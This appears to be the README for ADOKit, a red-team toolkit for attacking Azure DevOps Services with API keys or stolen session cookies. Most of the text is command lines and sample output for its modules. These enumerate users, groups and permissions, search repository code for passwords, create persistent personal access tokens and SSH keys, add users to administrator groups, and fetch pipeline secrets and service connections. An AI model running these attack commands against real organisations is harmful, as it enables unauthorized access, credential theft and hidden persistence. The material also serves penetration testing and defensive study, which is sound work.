Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
UserAuthentication
cookie on a user's machine for the .dev.azure.com
domain./credential:UserAuthentication=ABC123
/credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addbuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removebuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getserviceconnections | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
|
Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberhips
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchco de
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit-
followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmic rosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: List ing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributo rs | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
